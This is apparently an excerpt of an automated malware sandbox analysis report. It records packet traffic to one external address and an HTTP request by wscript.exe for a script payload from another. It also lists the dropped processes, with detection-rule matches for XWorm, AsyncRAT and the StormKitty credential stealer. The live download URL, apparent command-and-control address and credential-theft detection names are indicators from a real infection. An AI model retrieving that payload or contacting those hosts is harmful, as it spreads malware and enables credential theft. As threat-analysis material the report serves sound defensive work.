                          Oct 1, 2024 07:38:26.518868923 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518873930 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518886089 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518897057 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518907070 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518907070 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518918037 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518928051 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518946886 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.522727013 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.522738934 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.522880077 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.523046017 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.523057938 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.523068905 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.523099899 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.523140907 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.555759907 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555907965 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555918932 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555929899 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555947065 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555958986 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555969954 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555975914 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555980921 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555988073 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.555998087 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556010962 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556039095 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556057930 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556068897 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556080103 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556083918 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556092024 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556137085 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556150913 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556169987 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556227922 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556237936 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556292057 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556361914 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556379080 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556391001 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556402922 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556410074 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556416035 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556430101 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556446075 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556451082 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556457996 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556471109 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556478024 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556482077 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556488037 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556499958 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556520939 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556541920 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556723118 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556735039 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556746960 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556757927 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556768894 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556788921 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556793928 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556807041 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556809902 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556818008 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556830883 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556842089 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556843042 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556858063 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.556868076 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.556888103 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.557156086 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.557167053 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.557178020 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.557192087 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.557203054 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.557210922 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.557251930 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.560858965 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.560925961 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.560988903 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.561285019 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561448097 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561459064 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561470032 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561486006 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561501026 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.561506033 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561518908 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561527967 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.561532021 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561544895 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561556101 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561567068 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561569929 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.561579943 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561590910 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561592102 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.561603069 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561614990 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.561619043 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561631918 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561641932 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.561662912 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.561664104 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.561690092 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.564882994 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.564898014 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.564908981 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.564918995 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.564964056 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.564994097 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.604722977 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604793072 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604805946 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604818106 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604855061 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604866028 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604877949 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604882002 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.604957104 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604968071 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604979992 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.604985952 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.604990005 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605005026 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605015039 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605015993 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605027914 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605031013 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605040073 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605058908 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605098963 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605263948 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605274916 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605287075 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605298042 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605309010 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605318069 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605321884 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605340958 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605353117 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605355024 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605367899 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605371952 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605422020 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605490923 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605515003 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605525970 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605542898 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605567932 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605570078 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605583906 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605593920 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605623007 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605633020 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605639935 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605644941 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605657101 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605679035 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605703115 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605849028 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605890989 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.605935097 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605946064 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605957985 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605967999 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605981112 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605993032 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.605993986 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.606010914 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.606045008 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.606113911 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.606127977 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.606184006 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.609678984 CEST698049705194.37.97.150192.168.2.8
                          • 192.210.215.11
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.8 | 49704 | 192.210.215.11 | 80 | 5672 | C:\Windows\System32\wscript.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Oct 1, 2024 07:38:13.429106951 CEST | 328 | OUT | GET /zoom/cc.js HTTP/1.1
                          Accept: */*
                          Accept-Language: en-ch
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                          Host: 192.210.215.11
                          Connection: Keep-Alive
                          Oct 1, 2024 07:38:13.919840097 CEST | 1236 | IN | HTTP/1.1 200 OK
                          Date: Tue, 01 Oct 2024 05:38:13 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                          Last-Modified: Sun, 29 Sep 2024 18:34:13 GMT
                          ETag: "1a63a4-6234655ba12a5"
                          Accept-Ranges: bytes
                          Content-Length: 1729444
                          Content-Disposition: attachment
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: application/octet-stream



                          Target ID:0
                          Start time:01:38:11
                          Start date:01/10/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js"
                          Imagebase:0x7ff75f6e0000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:3
                          Start time:01:38:14
                          Start date:01/10/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js"
                          Imagebase:0x7ff75f6e0000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:01:38:18
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0x800000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:5
                          Start time:01:38:18
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0xca0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:false

                          Target ID:7
                          Start time:01:38:29
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0x9f0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low
                          Has exited:true

                          Target ID:8
                          Start time:01:38:30
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0xf90000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low
                          Has exited:true

                          Target ID:9
                          Start time:01:38:30
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0xa40000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:10
                          Start time:01:38:31
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0xa30000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:11
                          Start time:01:38:31
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0xcd0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:12
                          Start time:01:38:31
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0x6d0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:13
                          Start time:01:38:38
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0xae0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Target ID:14
                          Start time:01:38:38
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0x4f0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:15
                          Start time:01:38:38
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0x4c0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:16
                          Start time:01:38:38
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0x5f0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:17
                          Start time:01:38:38
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0x260000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:18
                          Start time:01:38:38
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Roaming\Service.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Service.exe"
                          Imagebase:0xc30000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:19
                          Start time:01:38:46
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0x6e0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:20
                          Start time:01:38:47
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0x10000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:21
                          Start time:01:38:47
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0x3b0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:22
                          Start time:01:38:47
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0x6c0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:23
                          Start time:01:38:47
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0x1f0000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:24
                          Start time:01:38:47
                          Start date:01/10/2024
                          Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                          Imagebase:0x910000
                          File size:59'904 bytes
                          MD5 hash:7284765CA4D2F85C487796F437B01822
                          Has elevated privileges:false
                          Has administrator privileges:false
